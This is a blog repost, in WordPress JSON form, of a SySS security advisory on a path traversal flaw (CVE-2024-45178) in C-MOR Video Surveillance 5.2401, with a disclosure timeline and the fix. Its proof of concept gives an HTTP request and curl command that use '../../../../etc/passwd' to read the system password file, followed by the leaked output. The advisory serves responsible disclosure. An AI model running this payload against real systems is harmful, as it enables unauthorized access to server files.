{"id":59511,"date":"2024-09-06T19:39:56","date_gmt":"2024-09-06T16:39:56","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181380\/SYSS-2024-025.txt"},"modified":"2024-09-06T19:39:56","modified_gmt":"2024-09-06T16:39:56","slug":"c-mor-video-surveillance-5-2401-path-traversal","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/c-mor-video-surveillance-5-2401-path-traversal\/","title":{"rendered":"C-MOR Video Surveillance 5.2401 Path Traversal"},"content":{"rendered":"<p>Advisory ID: SYSS-2024-025<br \/>Product: C-MOR Video Surveillance<br \/>Manufacturer: za-internet GmbH<br \/>Affected Version(s): 5.2401<br \/>Tested Version(s): 5.2401<br \/>Vulnerability Type: Relative Path Traversal (CWE-23)<br \/>Risk Level: High<br \/>Solution Status: Fixed<br \/>Manufacturer Notification: 2024-04-05<br \/>Solution Date: 2024-07-31<br \/>Public Disclosure: 2024-09-04<br \/>CVE Reference: CVE-2024-45178<br \/>Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br \/>and Matthias Deeg<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Overview:<\/p>\n<p>The software product C-MOR is an IP video surveillance system.<\/p>\n<p>The manufacturer describes the product as follows:<\/p>\n<p>&#8220;With C-MOR video surveillance, it is possible to check your<br \/>surveillance over network and the Internet. You can access the live<br \/>view as well as previous recordings from any PC or mobile device.<br \/>C-MOR is managed and controlled over the C-MOR web interface.<br \/>IP settings, camera recording setup, user rights and so on are set<br \/>over the web without the installation of any software on the<br \/>client.&#8221;[1]\n<p>Due to improper user input validation, it is possible to download<br \/>arbitrary files from the C-MOR system via a path traversal attack.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Vulnerability Details:<\/p>\n<p>By analyzing the C-MOR web interface, it was found that different<br \/>functionalities are vulnerable to path traversal attacks, which is<br \/>due to insufficient user input validation.<\/p>\n<p>For instance, the download functionality for backups provided by the<br \/>script &#8220;download-bkf.pml&#8221; is vulnerable to a path traversal<br \/>attack via the parameter &#8220;bkf&#8221;.<\/p>\n<p>This enables an authenticated user to download arbitrary files as<br \/>Linux user &#8220;www-data&#8221; from the C-MOR system.<\/p>\n<p>Another path traversal attack is in the script &#8220;show-movies.pml&#8221;,<br \/>which can be exploited via the parameter &#8220;cam&#8221;.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Proof of Concept (PoC):<\/p>\n<p>Using the following HTTP POST request with the relative path<br \/>&#8220;..\/..\/..\/..\/etc\/passwd&#8221; as value for the parameter &#8220;bkf&#8221;, it is<br \/>possible to download the file &#8220;\/etc\/passwd&#8221;:<\/p>\n<p>POST \/download-bkf.pml HTTP\/1.1<br \/>Host: &lt;HOST&gt;<br \/>Authorization: Basic &lt;CREDENTIALS&gt;<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 26<\/p>\n<p>bkf=..\/..\/..\/..\/etc\/passwd<\/p>\n<p>An example of a successful path traversal attack is demonstrated via<br \/>the following curl command:<\/p>\n<p>$ curl -X POST -d &#8216;bkf=..\/..\/..\/..\/etc\/passwd&#8217; &#8211;user <br \/>&#8216;&lt;USERNAME&gt;:&lt;PASSWORD&gt;&#8217; &#8211;ciphers &#8216;DEFAULT:!DH&#8217; <br \/>https:\/\/&lt;HOST&gt;\/download-bkf.pml<br \/>root:x:0:0:root:\/root:\/bin\/bash<br \/>daemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh<br \/>bin:x:2:2:bin:\/bin:\/bin\/sh<br \/>sys:x:3:3:sys:\/dev:\/bin\/sh<br \/>sync:x:4:65534:sync:\/bin:\/bin\/sync<br \/>games:x:5:60:games:\/usr\/games:\/bin\/sh<br \/>man:x:6:12:man:\/var\/cache\/man:\/bin\/sh<br \/>lp:x:7:7:lp:\/var\/spool\/lpd:\/bin\/sh<br \/>mail:x:8:8:mail:\/var\/mail:\/bin\/sh<br \/>news:x:9:9:news:\/var\/spool\/news:\/bin\/sh<br \/>uucp:x:10:10:uucp:\/var\/spool\/uucp:\/bin\/sh<br \/>proxy:x:13:13:proxy:\/bin:\/bin\/sh<br \/>www-data:x:33:33:www-data:\/var\/www:\/bin\/sh<br \/>backup:x:34:34:backup:\/var\/backups:\/bin\/sh<br \/>list:x:38:38:Mailing List Manager:\/var\/list:\/bin\/sh<br \/>irc:x:39:39:ircd:\/var\/run\/ircd:\/bin\/sh<br \/>gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/bin\/sh<br \/>nobody:x:65534:65534:nobody:\/nonexistent:\/bin\/sh<br \/>libuuid:x:100:101::\/var\/lib\/libuuid:\/bin\/sh<br \/>Debian-exim:x:101:103::\/var\/spool\/exim4:\/bin\/false<br \/>statd:x:102:65534::\/var\/lib\/nfs:\/bin\/false<br \/>sshd:x:103:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin<br \/>cam:x:1000:1000:Cam,,,:\/home\/cam:\/bin\/bash<br \/>postfix:x:104:107::\/var\/spool\/postfix:\/bin\/false<br \/>stunnel4:x:105:109::\/var\/run\/stunnel4:\/bin\/false<br \/>mysql:x:106:110:MySQL Server,,,:\/var\/lib\/mysql:\/bin\/false<br \/>messagebus:x:107:113::\/var\/run\/dbus:\/bin\/false<br \/>ntp:x:108:114::\/home\/ntp:\/bin\/false<br \/>download:x:1002:1002:Download User:\/home\/download:\/bin\/bash<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Solution:<\/p>\n<p>Install C-MOR Video Surveillance version 6.00PL1.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Disclosure Timeline:<\/p>\n<p>2024-04-05: Vulnerability reported to manufacturer<br \/>2024-04-05: Manufacturer acknowledges receipt of security advisories<br \/>2024-04-08: Exchange regarding security updates and disclosure timeline<br \/>2024-05-08: Further exchange concerning security updates and disclosure<br \/>timeline; public release of all security advisories<br \/>scheduled for release of C-MOR Video Surveillance version 6<br \/>2024-05-10: Release of C-MOR software version 5.30 with security updates<br \/>for some reported security issues<br \/>2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br \/>Video Surveillance version 6; response with planned<br \/>release date of 2024-08-01<br \/>2024-07-30: E-mail from manufacturer with further information<br \/>concerning security fixes<br \/>2024-07-31: Release of C-MOR software version 6.00PL1<br \/>2024-09-04: Public release of security advisory<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>References:<\/p>\n[1] Product website for C-MOR Video Surveillance<br \/>https:\/\/www.c-mor.com\/<br \/>[2] SySS Security Advisory SYSS-2024-025<\/p>\n<p>https:\/\/www.syss.de\/fileadmin\/dokumente\/Publikationen\/Advisories\/SYSS-2024-025.txt<br \/>[3] SySS Responsible Disclosure Policy<br \/>https:\/\/www.syss.de\/en\/responsible-disclosure-policy\/<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Credits:<\/p>\n<p>This security vulnerability was found by Chris Beiter, Frederik<br \/>Beimgraben, and Matthias Deeg.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Disclaimer:<\/p>\n<p>The information provided in this security advisory is provided &#8220;as is&#8221;<br \/>and without warranty of any kind. Details of this security advisory may<br \/>be updated in order to provide as accurate information as possible. The<br \/>latest version of this security advisory is available on the SySS Web<br \/>site.<\/p>\n<p>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n<p>Copyright:<\/p>\n<p>Creative Commons &#8211; Attribution (by) &#8211; Version 3.0<br \/>URL: http:\/\/creativecommons.org\/licenses\/by\/3.0\/deed.en<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Advisory ID: SYSS-2024-025Product: C-MOR Video SurveillanceManufacturer: za-internet GmbHAffected Version(s): 5.2401Tested Version(s): 5.2401Vulnerability Type: Relative Path Traversal (CWE-23)Risk Level: HighSolution Status: FixedManufacturer Notification: 2024-04-05Solution Date: 2024-07-31Public Disclosure: 2024-09-04CVE Reference: CVE-2024-45178Authors of Advisory: Chris Beiter, Frederik Beimgraben,and Matthias Deeg ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The software product C-MOR is an IP video surveillance system. The manufacturer describes the product as &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59511","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59511","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59511"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59511\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59511"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59511"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59511"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}